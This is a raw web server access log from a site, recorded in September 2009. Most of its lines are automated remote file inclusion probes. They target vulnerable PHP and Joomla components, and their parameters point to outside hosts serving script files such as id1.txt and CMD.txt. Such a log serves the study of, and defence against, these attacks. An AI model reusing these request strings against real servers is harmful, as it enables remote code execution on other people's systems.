61.135.134.215 - - [28/Sep/2009:01:31:36 -0700] "GET /Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.215 - - [28/Sep/2009:01:31:36 -0700] "GET /logs//Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.215 - - [28/Sep/2009:01:31:40 -0700] "GET /Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.215 - - [28/Sep/2009:01:31:40 -0700] "GET /logs/access.log//Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.215 - - [28/Sep/2009:01:31:40 -0700] "GET /logs//Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
203.185.129.36 - - [28/Sep/2009:01:32:38 -0700] "GET /logs//Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
203.185.129.36 - - [28/Sep/2009:01:32:38 -0700] "GET /Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
203.185.129.36 - - [28/Sep/2009:01:32:38 -0700] "GET /logs/access.log%20%20//Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
206.225.23.4 - - [28/Sep/2009:01:32:50 -0700] "GET /logs/access_090706.log%20%20//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:01:32:50 -0700] "GET /logs//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:01:32:50 -0700] "GET /errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:01:33:11 -0700] "GET /logs/access_090316.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:01:33:11 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:01:33:11 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.202.2.64 - - [28/Sep/2009:01:33:16 -0700] "GET /logs/access_090810.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.202.2.64 - - [28/Sep/2009:01:33:44 -0700] "GET /logs/access_090316.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [28/Sep/2009:01:33:48 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [28/Sep/2009:01:33:50 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [28/Sep/2009:01:33:50 -0700] "GET /logs/access_090525.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [28/Sep/2009:01:33:53 -0700] "GET /logs/access.log//Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.78 - - [28/Sep/2009:01:33:53 -0700] "GET /Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.78 - - [28/Sep/2009:01:33:53 -0700] "GET /logs//Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.4.8.14 - - [28/Sep/2009:01:33:54 -0700] "GET /logs/access_090706.log%20%20//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [28/Sep/2009:01:33:54 -0700] "GET /logs//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [28/Sep/2009:01:33:54 -0700] "GET /errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.215 - - [28/Sep/2009:01:34:02 -0700] "GET /Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.215 - - [28/Sep/2009:01:34:02 -0700] "GET /logs/access.log//Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.215 - - [28/Sep/2009:01:34:02 -0700] "GET /logs//Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
121.130.29.11 - - [28/Sep/2009:01:34:19 -0700] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [28/Sep/2009:01:35:41 -0700] "GET /logs/access_090706.log//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:01:35:47 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:01:35:47 -0700] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:01:35:47 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://cubicolor.fr//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [28/Sep/2009:01:36:35 -0700] "GET /logs/access_090831.log//errors.php?error=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [28/Sep/2009:01:41:00 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [28/Sep/2009:01:41:00 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [28/Sep/2009:01:41:01 -0700] "GET /logs/access_090316.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.215 - - [28/Sep/2009:01:41:37 -0700] "GET /Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.215 - - [28/Sep/2009:01:41:37 -0700] "GET /logs/access.log//Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.135.134.215 - - [28/Sep/2009:01:41:37 -0700] "GET /logs//Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.27.203.107 - - [28/Sep/2009:01:44:33 -0700] "GET /logs/access_090622.log//index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:01:45:22 -0700] "GET /logs/access_090629.log//index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [28/Sep/2009:01:45:45 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [28/Sep/2009:01:45:48 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [28/Sep/2009:01:45:48 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [28/Sep/2009:01:45:51 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [28/Sep/2009:01:45:51 -0700] "GET /logs/access_090706.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [28/Sep/2009:01:45:53 -0700] "GET /logs/access_090706.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [28/Sep/2009:01:46:13 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://global-independent.net/mp3/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [28/Sep/2009:01:46:13 -0700] "GET /logs/access_090810.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://global-independent.net/mp3/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [28/Sep/2009:01:46:13 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://global-independent.net/mp3/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [28/Sep/2009:01:46:20 -0700] "GET /logs/access_090525.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://global-independent.net/mp3/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [28/Sep/2009:01:46:32 -0700] "GET /logs/access_090330.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [28/Sep/2009:01:46:36 -0700] "GET /logs/access_090330.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.106.114 - - [28/Sep/2009:01:47:20 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:01:47:36 -0700] "GET /logs/access_090622.log//index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:01:48:21 -0700] "GET /logs/access_090629.log//index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [28/Sep/2009:01:48:23 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.184.252.3 - - [28/Sep/2009:01:48:26 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.115.89.7 - - [28/Sep/2009:01:48:28 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:01:48:28 -0700] "GET /logs//samplefaqsupport.php?path[docroot]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:01:48:29 -0700] "GET /logs/access_090420.log//samplefaqsupport.php?path[docroot]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [28/Sep/2009:01:48:32 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.27.203.107 - - [28/Sep/2009:01:49:29 -0700] "GET /logs/access_090622.log//index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:01:49:52 -0700] "GET /logs/access_090629.log//index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:01:50:57 -0700] "GET /logs/access_090622.log//index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:01:51:14 -0700] "GET /logs/access_090629.log//index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:01:51:48 -0700] "GET /logs/access_090622.log//index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:01:52:08 -0700] "GET /logs/access_090629.log//index.php?DOCUMENT_ROOT=http://feedbee.com/support/wpThumbnails/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [28/Sep/2009:01:52:37 -0700] "GET /logs/access_090810.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [28/Sep/2009:01:52:52 -0700] "GET /logs/access_090525.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [28/Sep/2009:01:54:01 -0700] "GET /logs/access_090420.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:01:58:29 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:01:58:29 -0700] "GET /logs/access_090420.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:01:58:29 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
121.130.29.11 - - [28/Sep/2009:01:58:50 -0700] "GET /logs/access_090316.log////?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [28/Sep/2009:02:01:20 -0700] "GET /logs/access_090504.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.meililai.co.kr/bbs//zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [28/Sep/2009:02:07:47 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
218.27.203.107 - - [28/Sep/2009:02:07:51 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
69.175.29.34 - - [28/Sep/2009:02:08:32 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [28/Sep/2009:02:08:32 -0700] "GET /logs/access_090420.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [28/Sep/2009:02:08:32 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:02:09:32 -0700] "GET /logs/access_090511.log%20%20//common.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:02:09:32 -0700] "GET /logs//common.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:02:09:32 -0700] "GET /common.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [28/Sep/2009:02:10:33 -0700] "GET /logs/access_090406.log%20%20//common.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.43.206.220 - - [28/Sep/2009:02:11:09 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.43.206.220 - - [28/Sep/2009:02:11:09 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.43.206.220 - - [28/Sep/2009:02:11:09 -0700] "GET /logs/access_090420.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.43.206.220 - - [28/Sep/2009:02:14:54 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.43.206.220 - - [28/Sep/2009:02:14:54 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.43.206.220 - - [28/Sep/2009:02:14:54 -0700] "GET /logs/access.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
65.55.106.114 - - [28/Sep/2009:02:16:04 -0700] "GET /labia/?M=D HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
61.100.5.136 - - [28/Sep/2009:02:19:35 -0700] "GET /logs/access_090511.log%20%20//common.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [28/Sep/2009:02:19:35 -0700] "GET /logs//common.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [28/Sep/2009:02:19:35 -0700] "GET /common.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.254.35.120 - - [28/Sep/2009:02:19:37 -0700] "GET /common.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.254.35.120 - - [28/Sep/2009:02:19:37 -0700] "GET /logs//common.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.254.35.120 - - [28/Sep/2009:02:19:37 -0700] "GET /logs/access_090511.log%20%20//common.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.254.35.120 - - [28/Sep/2009:02:20:02 -0700] "GET /logs/access_090406.log%20%20//common.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.5.136 - - [28/Sep/2009:02:20:05 -0700] "GET /logs/access_090406.log%20%20//common.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:02:20:08 -0700] "GET /common.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:02:20:09 -0700] "GET /logs//common.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:02:20:09 -0700] "GET /logs/access_090511.log%20%20//common.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.115.89.7 - - [28/Sep/2009:02:20:41 -0700] "GET /logs/access_090406.log%20%20//common.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.254.35.120 - - [28/Sep/2009:02:22:32 -0700] "GET /logs/access_090511.log//common.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.43.206.220 - - [28/Sep/2009:02:23:24 -0700] "GET /logs/access_090720.log%20%20//newspublish/include.php?path[docroot]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.43.206.220 - - [28/Sep/2009:02:23:24 -0700] "GET /newspublish/include.php?path[docroot]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.43.206.220 - - [28/Sep/2009:02:23:26 -0700] "GET /logs//newspublish/include.php?path[docroot]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.254.35.120 - - [28/Sep/2009:02:23:29 -0700] "GET /logs/access_090406.log//common.class.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.43.206.220 - - [28/Sep/2009:02:23:37 -0700] "GET /logs//newspublish/include.php?path[docroot]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.43.206.220 - - [28/Sep/2009:02:23:37 -0700] "GET /newspublish/include.php?path[docroot]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.43.206.220 - - [28/Sep/2009:02:23:37 -0700] "GET /logs/access.log%20%20//newspublish/include.php?path[docroot]=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.29.34 - - [28/Sep/2009:02:26:09 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [28/Sep/2009:02:26:09 -0700] "GET /logs/access_090824.log//admin/business_inc/saveserver.php?thisdir=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [28/Sep/2009:02:26:09 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [28/Sep/2009:02:26:41 -0700] "GET /logs/access_090907.log//admin/business_inc/saveserver.php?thisdir=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
